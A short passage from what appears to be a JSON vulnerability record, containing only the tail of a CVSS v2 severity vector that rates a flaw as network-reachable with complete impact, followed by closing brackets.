"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}